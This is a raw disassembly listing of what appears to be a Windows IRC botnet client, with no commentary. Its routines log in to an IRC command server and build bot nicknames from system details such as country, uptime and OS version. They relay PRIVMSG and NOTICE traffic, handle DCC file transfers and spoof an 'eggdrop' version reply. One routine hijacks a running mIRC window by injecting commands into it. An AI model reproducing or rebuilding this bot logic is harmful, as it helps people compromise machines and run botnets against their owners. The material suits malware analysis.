imul eax, 0Ch
cmp dword_41DA70[eax], 0
jz short loc_40D020
mov eax, [ebp+var_8]
imul eax, 0Ch
push dword_41DA70[eax]
push offset byte_41E718
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D020: ; CODE XREF: sub_40CF2F:loc_40CF99�j
; sub_40CF2F+D7�j
push offset dword_41E898
call sub_4105AD
pop ecx
push offset dword_41E998
call sub_4105AD
pop ecx
push offset byte_41E718
call sub_4105AD
pop ecx
leave
retn
sub_40CF2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D043 proc near ; CODE XREF: sub_40D366+7F�p
; sub_40D871+619�p
var_250 = dword ptr -250h
var_24C = byte ptr -24Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_220 = dword ptr -220h
var_21C = dword ptr -21Ch
var_218 = dword ptr -218h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
var_184 = byte ptr -184h
var_104 = byte ptr -104h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push edi
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_80]
push eax
call sub_40668F
add esp, 0Ch
movsx eax, byte_41E718
test eax, eax
jz short loc_40D099
push offset byte_41E718
call sub_4105FB
pop ecx
push offset byte_41E718
push offset aPassS ; "PASS %s"
call sub_40D6CB
pop ecx
pop ecx
push offset byte_41E718
call sub_4105AD
pop ecx
loc_40D099: ; CODE XREF: sub_40D043+2D�j
cmp [ebp+arg_0], 0
jz loc_40D132
movsx eax, byte_41EEC8
test eax, eax
jz short loc_40D0C3
push offset byte_41EEC8
lea eax, [ebp+var_184]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40D0D6
; ---------------------------------------------------------------------------
loc_40D0C3: ; CODE XREF: sub_40D043+69�j
lea eax, [ebp+var_184]
push eax
push offset byte_41EEC8
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D0D6: ; CODE XREF: sub_40D043+7E�j
movsx eax, byte_41F048
test eax, eax
jz short loc_40D0F6
push offset byte_41F048
lea eax, [ebp+var_104]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_40D109
; ---------------------------------------------------------------------------
loc_40D0F6: ; CODE XREF: sub_40D043+9C�j
lea eax, [ebp+var_104]
push eax
push offset byte_41F048
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D109: ; CODE XREF: sub_40D043+B1�j
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
lea eax, [ebp+var_184]
push eax
push offset aUserSSSS ; "USER %s %s %s :%s"
call sub_40D6CB
add esp, 14h
loc_40D132: ; CODE XREF: sub_40D043+5A�j
cmp [ebp+arg_4], 0
jz loc_40D363
cmp [ebp+arg_0], 0
jz short loc_40D163
movsx eax, byte_41EE48
test eax, eax
jz short loc_40D163
push offset byte_41EE48
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40D363
; ---------------------------------------------------------------------------
loc_40D163: ; CODE XREF: sub_40D043+FD�j
; sub_40D043+108�j
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_188], eax
cmp [ebp+var_188], 4
jnb short loc_40D18D
call sub_406AE7
test eax, eax
jz loc_40D31F
loc_40D18D: ; CODE XREF: sub_40D043+13B�j
call sub_406A23
lea eax, [ebp+var_24C]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40D1B6
push offset aUnk ; "UNK"
lea eax, [ebp+var_24C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D1B6: ; CODE XREF: sub_40D043+15E�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40D1CF
call sub_408E8E
mov [ebp+var_250], eax
jmp short loc_40D1D9
; ---------------------------------------------------------------------------
loc_40D1CF: ; CODE XREF: sub_40D043+17D�j
mov [ebp+var_250], 400h
loc_40D1D9: ; CODE XREF: sub_40D043+18A�j
mov eax, [ebp+var_250]
shr eax, 0Ah
mov [ebp+var_228], eax
call sub_408887
mov [ebp+var_18C], eax
mov [ebp+var_224], offset aB ; "B"
cmp [ebp+var_18C], 2EEh
jnb short loc_40D213
mov [ebp+var_224], offset aA ; "A"
loc_40D213: ; CODE XREF: sub_40D043+1C4�j
cmp [ebp+var_18C], 1F4h
jnb short loc_40D229
mov [ebp+var_224], offset aG ; "G"
loc_40D229: ; CODE XREF: sub_40D043+1DA�j
and [ebp+var_22C], 0
mov [ebp+var_220], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_21C]
rep stosd
lea eax, [ebp+var_220]
push eax
call dword_417030 ; GetVersionExA
cmp [ebp+var_21C], 5
jnz short loc_40D270
cmp [ebp+var_218], 1
jnz short loc_40D270
mov [ebp+var_22C], 1
loc_40D270: ; CODE XREF: sub_40D043+218�j
; sub_40D043+221�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_22C], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_224]
push [ebp+var_228]
push 5Dh
push [ebp+var_188]
push 5Bh
push 5Dh
lea eax, [ebp+var_24C]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_80]
push eax
call sub_416B5E ; sprintf
add esp, 34h
movsx eax, byte_41DB34
test eax, eax
jz short loc_40D31D
push offset byte_41DB34
push offset dword_41DAB4
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41DAB4
call sub_4105FB
pop ecx
movsx eax, byte_41DBB4
test eax, eax
jz short loc_40D31D
push offset byte_41DBB4
push offset dword_41ED48
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41ED48
call sub_4105FB
pop ecx
loc_40D31D: ; CODE XREF: sub_40D043+295�j
; sub_40D043+2BC�j
jmp short loc_40D343
; ---------------------------------------------------------------------------
loc_40D31F: ; CODE XREF: sub_40D043+144�j
push offset dword_41DAA4
lea eax, [ebp+var_80]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_80]
push eax
call sub_40D7E5
pop ecx
loc_40D343: ; CODE XREF: sub_40D043:loc_40D31D�j
lea eax, [ebp+var_80]
push eax
push offset dword_419F04
call sub_40D6CB
pop ecx
pop ecx
lea eax, [ebp+var_80]
push eax
push offset byte_41EE48
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40D363: ; CODE XREF: sub_40D043+F3�j
; sub_40D043+11B�j
pop edi
leave
retn
sub_40D043 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D366 proc near ; CODE XREF: sub_40A9CF+1521�p
; sub_40D871+4A7�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CF2F
add esp, 0Ch
push dword_41E9A4
call sub_40538D
pop ecx
mov [ebp+var_4], 0EA60h
loc_40D38E: ; CODE XREF: sub_40D366:loc_40D419�j
push offset dword_41E898
call sub_4105FB
pop ecx
push offset dword_41E998
call sub_4105FB
pop ecx
push 2710h
push 1
push offset dword_41E998
push offset dword_41E898
call sub_4050EA
add esp, 10h
mov dword_41E9A4, eax
push offset dword_41E898
call sub_4105AD
pop ecx
push offset dword_41E998
call sub_4105AD
pop ecx
cmp dword_41E9A4, 0
jz short loc_40D3EE
push 1
push 1
call sub_40D043
pop ecx
pop ecx
jmp short locret_40D41E
; ---------------------------------------------------------------------------
loc_40D3EE: ; CODE XREF: sub_40D366+79�j
push 0
push 0
push 0
call sub_40CF2F
add esp, 0Ch
push [ebp+var_4]
call dword_41709C ; Sleep
cmp [ebp+var_4], 0A4CB80h
jge short loc_40D419
mov eax, [ebp+var_4]
add eax, 0EA60h
mov [ebp+var_4], eax
loc_40D419: ; CODE XREF: sub_40D366+A6�j
jmp loc_40D38E
; ---------------------------------------------------------------------------
locret_40D41E: ; CODE XREF: sub_40D366+86�j
leave
retn
sub_40D366 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D420 proc near ; CODE XREF: sub_4020C2+1DE�p
; sub_40A9CF+1219�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D420 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4AB proc near ; CODE XREF: sub_4020C2+21B�p
; sub_40332B+1A6�p ...
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
push [ebp+arg_0]
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1004]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_1008], eax
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_1008]
push eax
mov eax, [ebp+var_1008]
lea eax, [ebp+eax+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D4AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D53F proc near ; CODE XREF: sub_401244+51�p
; sub_401244+41E�p ...
var_1008 = byte ptr -1008h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 1008h
call sub_416BC0
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+198h]
test eax, eax
jz short loc_40D55F
jmp locret_40D6C9
; ---------------------------------------------------------------------------
loc_40D55F: ; CODE XREF: sub_40D53F+19�j
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 1
jnz short loc_40D58F
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aNoticeS ; "NOTICE %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D58F: ; CODE XREF: sub_40D53F+2E�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jnz short loc_40D5BB
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A058
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5BB: ; CODE XREF: sub_40D53F+5A�j
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D5E7
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset dword_41A048
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5E7: ; CODE XREF: sub_40D53F+86�j
mov eax, [ebp+arg_0]
add eax, 21h
push eax
push offset aPrivmsgS ; "PRIVMSG %s :"
lea eax, [ebp+var_1008]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
mov [ebp+var_8], eax
loc_40D605: ; CODE XREF: sub_40D53F+4E�j
; sub_40D53F+7A�j ...
mov eax, [ebp+arg_0]
cmp dword ptr [eax+19Fh], 0
jz short loc_40D63C
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D629
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D63C
loc_40D629: ; CODE XREF: sub_40D53F+DC�j
push offset dword_41A03C
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
loc_40D63C: ; CODE XREF: sub_40D53F+D0�j
; sub_40D53F+E8�j
lea eax, [ebp+arg_8]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_4]
mov eax, 1000h
sub eax, [ebp+var_8]
push eax
mov eax, [ebp+var_8]
lea eax, [ebp+eax+var_1008]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 2
jz short loc_40D680
mov eax, [ebp+arg_0]
cmp dword ptr [eax+121h], 3
jnz short loc_40D693
loc_40D680: ; CODE XREF: sub_40D53F+133�j
push offset dword_41A038
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
loc_40D693: ; CODE XREF: sub_40D53F+13F�j
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1008]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1008]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1008]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
locret_40D6C9: ; CODE XREF: sub_40D53F+1B�j
leave
retn
sub_40D53F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D6CB proc near ; CODE XREF: sub_40332B+205�p
; sub_40332B+212�p ...
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1004h
call sub_416BC0
lea eax, [ebp+arg_4]
mov [ebp+var_4], eax
push [ebp+var_4]
push [ebp+arg_0]
push 1000h
lea eax, [ebp+var_1004]
push eax
call sub_416DF0 ; _vsnprintf
add esp, 10h
and [ebp+var_4], 0
push offset asc_418214 ; "\r\n"
lea eax, [ebp+var_1004]
push eax
call sub_416B70 ; strcat
pop ecx
pop ecx
lea eax, [ebp+var_1004]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_1004]
push eax
push dword_41E9A4
call sub_4053BF
add esp, 0Ch
leave
retn
sub_40D6CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D734 proc near ; CODE XREF: sub_40D74D:loc_40D75E�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push offset aMirc ; "mIRC"
call dword_4171E8 ; FindWindowA
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_40D734 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D74D proc near ; CODE XREF: sub_40A9CF+926�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_0], 0
jnz short loc_40D75E
jmp locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D75E: ; CODE XREF: sub_40D74D+A�j
call sub_40D734
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40D76E
jmp short locret_40D7E3
; ---------------------------------------------------------------------------
loc_40D76E: ; CODE XREF: sub_40D74D+1D�j
push offset aMirc ; "mIRC"
push 1000h
push 0
push 4
push 0
push 0FFFFFFFFh
call dword_4170C0 ; CreateFileMappingA
mov [ebp+var_8], eax
push 0
push 0
push 0
push 0F001Fh
push [ebp+var_8]
call dword_4170BC ; MapViewOfFile
mov [ebp+var_C], eax
push [ebp+arg_0]
push [ebp+var_C]
call sub_416B5E ; sprintf
pop ecx
pop ecx
push 0
push 1
push 4C8h
push [ebp+var_4]
call dword_4171EC ; SendMessageA
push 0
push 1
push 4C9h
push [ebp+var_4]
call dword_4171EC ; SendMessageA
push [ebp+var_C]
call dword_4170B8 ; UnmapViewOfFile
push [ebp+var_8]
call dword_4170A4 ; CloseHandle
locret_40D7E3: ; CODE XREF: sub_40D74D+C�j
; sub_40D74D+1F�j
leave
retn
sub_40D74D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D7E5 proc near ; CODE XREF: sub_40A9CF+E3�p
; sub_40D043+2FA�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_0]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_8], eax
and [ebp+var_4], 0
jmp short loc_40D803
; ---------------------------------------------------------------------------
loc_40D7FC: ; CODE XREF: sub_40D7E5:loc_40D86D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_40D803: ; CODE XREF: sub_40D7E5+15�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jge short locret_40D86F
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 23h
jnz short loc_40D82E
push 39h
push 30h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D82E: ; CODE XREF: sub_40D7E5+32�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 3Fh
jnz short loc_40D86D
call sub_410483
test eax, eax
jz short loc_40D85A
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_40D86D
; ---------------------------------------------------------------------------
loc_40D85A: ; CODE XREF: sub_40D7E5+5E�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
loc_40D86D: ; CODE XREF: sub_40D7E5+47�j
; sub_40D7E5+55�j ...
jmp short loc_40D7FC
; ---------------------------------------------------------------------------
locret_40D86F: ; CODE XREF: sub_40D7E5+24�j
leave
retn
sub_40D7E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D871 proc near ; CODE XREF: sub_40E618+321�p
var_7E8 = dword ptr -7E8h
var_7E4 = dword ptr -7E4h
var_7E0 = dword ptr -7E0h
var_7DC = byte ptr -7DCh
var_7D8 = dword ptr -7D8h
var_7D4 = dword ptr -7D4h
var_7D0 = dword ptr -7D0h
var_7CC = dword ptr -7CCh
var_7C8 = dword ptr -7C8h
var_7C4 = byte ptr -7C4h
var_7C0 = dword ptr -7C0h
var_7BC = byte ptr -7BCh
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_4B4 = byte ptr -4B4h
var_490 = byte ptr -490h
var_390 = byte ptr -390h
var_370 = dword ptr -370h
var_36C = dword ptr -36Ch
var_368 = dword ptr -368h
var_364 = dword ptr -364h
var_360 = dword ptr -360h
var_35C = dword ptr -35Ch
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_238 = dword ptr -238h
var_234 = byte ptr -234h
var_213 = byte ptr -213h
var_113 = dword ptr -113h
var_10F = byte ptr -10Fh
var_95 = dword ptr -95h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 7E8h
push edi
push offset aPing ; "PING"
mov eax, [ebp+arg_C]
push dword ptr [eax]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8A7
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
push offset aPongS ; "PONG %s"
call sub_40D6CB
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8A7: ; CODE XREF: sub_40D871+1D�j
push offset aPong ; "PONG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8C2
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8C2: ; CODE XREF: sub_40D871+4A�j
push offset aMode ; "MODE"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40D8DD
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D8DD: ; CODE XREF: sub_40D871+65�j
push offset aPrivmsg ; "PRIVMSG"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DB2D
mov eax, [ebp+arg_C]
cmp dword ptr [eax+0Ch], 0
jz loc_40DB2D
mov eax, [ebp+arg_C]
mov eax, [eax+0Ch]
movsx eax, byte ptr [eax+1]
cmp eax, 1
jnz loc_40DB2D
push offset dword_41A14C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+10h], 0
jz loc_40DA81
push offset aSend ; "SEND"
mov eax, [ebp+arg_C]
push dword ptr [eax+10h]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DA81
cmp [ebp+arg_0], 0
jz loc_40DA81
mov eax, [ebp+arg_C]
cmp dword ptr [eax+14h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+18h], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+1Ch], 0
jz short loc_40D986
mov eax, [ebp+arg_C]
cmp dword ptr [eax+20h], 0
jnz short loc_40D98B
loc_40D986: ; CODE XREF: sub_40D871+F8�j
; sub_40D871+101�j ...
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D98B: ; CODE XREF: sub_40D871+113�j
mov eax, [ebp+arg_C]
mov eax, [eax+14h]
movsx eax, byte ptr [eax]
cmp eax, 22h
jnz short loc_40D99E
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40D99E: ; CODE XREF: sub_40D871+126�j
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp+arg_C]
mov ecx, [ecx+20h]
and byte ptr [ecx+eax], 0
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41DAB4
lea eax, [ebp+var_213]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
and [ebp+var_113], 0
push 7Ah
push 0
lea eax, [ebp+var_10F]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_95], 1
mov eax, [ebp+arg_C]
push dword ptr [eax+18h]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_238], eax
movzx eax, byte ptr [ebp+var_238]
push eax
mov eax, [ebp+var_238]
shr eax, 8
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 10h
movzx eax, al
push eax
mov eax, [ebp+var_238]
shr eax, 18h
movzx eax, al
push eax
push offset dword_418A50
lea eax, [ebp+var_248]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov eax, [ebp+arg_C]
push dword ptr [eax+20h]
mov eax, [ebp+arg_C]
push dword ptr [eax+1Ch]
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+arg_C]
push dword ptr [eax+14h]
push [ebp+arg_4]
lea eax, [ebp+var_234]
push eax
call sub_4024F3
add esp, 18h
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DA81: ; CODE XREF: sub_40D871+BA�j
; sub_40D871+C7�j ...
push offset dword_41A138
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DAAD
push offset dword_41A12C
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_40DAEB
loc_40DAAD: ; CODE XREF: sub_40D871+224�j
cmp [ebp+arg_0], 0
jz short loc_40DAD1
push offset dword_41DC34
push 3B6h
push 0
push offset dword_41A108
push [ebp+arg_4]
call sub_40D420
add esp, 14h
jmp short loc_40DAE6
; ---------------------------------------------------------------------------
loc_40DAD1: ; CODE XREF: sub_40D871+240�j
push offset aEggdropV1_6_16 ; "eggdrop v1.6.16"
push offset dword_41A0E8
push [ebp+arg_4]
call sub_40D420
add esp, 0Ch
loc_40DAE6: ; CODE XREF: sub_40D871+25E�j
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DAEB: ; CODE XREF: sub_40D871+23A�j
push offset dword_41A0E0
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jz short loc_40DB16
push offset dword_41A0D8
mov eax, [ebp+arg_C]
push dword ptr [eax+0Ch]
call dword_417108 ; lstrcmpA
test eax, eax
jnz short loc_40DB2D
loc_40DB16: ; CODE XREF: sub_40D871+28E�j
mov eax, [ebp+arg_10]
mov eax, [eax+0Ch]
inc eax
push eax
push [ebp+arg_4]
call sub_40D420
pop ecx
pop ecx
jmp loc_40E615
; ---------------------------------------------------------------------------
loc_40DB2D: ; CODE XREF: sub_40D871+80�j
; sub_40D871+8D�j ...
push offset a433 ; "433"
mov eax, [ebp+arg_C]
push dword ptr [eax+4]
call sub_416F74 ; _stricmp
pop ecx
pop ecx
test eax, eax
jnz loc_40DCFD
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_2CC], eax
cmp [ebp+var_2CC], 4
jnb short loc_40DB71
call sub_406AE7
test eax, eax
jz loc_40DCB8
loc_40DB71: ; CODE XREF: sub_40D871+2F1�j
call sub_406A23
lea eax, [ebp+var_390]
push eax
call sub_408342
pop ecx
test eax, eax
jnz short loc_40DB9A
push offset aUnk ; "UNK"
lea eax, [ebp+var_390]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
loc_40DB9A: ; CODE XREF: sub_40D871+314�j
call sub_408E8E
cmp eax, 400h
jbe short loc_40DBB3
call sub_408E8E
mov [ebp+var_7E4], eax
jmp short loc_40DBBD
; ---------------------------------------------------------------------------
loc_40DBB3: ; CODE XREF: sub_40D871+333�j
mov [ebp+var_7E4], 400h
loc_40DBBD: ; CODE XREF: sub_40D871+340�j
mov eax, [ebp+var_7E4]
shr eax, 0Ah
mov [ebp+var_36C], eax
call sub_408887
mov [ebp+var_2D0], eax
mov [ebp+var_368], offset aB ; "B"
cmp [ebp+var_2D0], 3E8h
jnb short loc_40DBF7
mov [ebp+var_368], offset aA ; "A"
loc_40DBF7: ; CODE XREF: sub_40D871+37A�j
cmp [ebp+var_2D0], 1F4h
jnb short loc_40DC0D
mov [ebp+var_368], offset aG ; "G"
loc_40DC0D: ; CODE XREF: sub_40D871+390�j
and [ebp+var_370], 0
mov [ebp+var_364], 94h
push 24h
pop ecx
xor eax, eax
lea edi, [ebp+var_360]
rep stosd
lea eax, [ebp+var_364]
push eax
call dword_417030 ; GetVersionExA
cmp [ebp+var_360], 5
jnz short loc_40DC54
cmp [ebp+var_35C], 1
jnz short loc_40DC54
mov [ebp+var_370], 1
loc_40DC54: ; CODE XREF: sub_40D871+3CE�j
; sub_40D871+3D7�j
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
push 5Ah
push 41h
call sub_4103F5
pop ecx
pop ecx
push eax
cmp [ebp+var_370], 0
setz al
dec eax
and eax, 2Fh
add eax, 2Dh
movsx eax, al
push eax
push [ebp+var_368]
push [ebp+var_36C]
push 5Dh
push [ebp+var_2CC]
push 5Bh
push 5Dh
lea eax, [ebp+var_390]
push eax
push 5Bh
push offset aCSCCUCUSCCC ; "%c%s%c%c%u%c%u%s%c%c%c"
lea eax, [ebp+var_2C8]
push eax
call sub_416B5E ; sprintf
add esp, 34h
jmp short loc_40DCE5
; ---------------------------------------------------------------------------
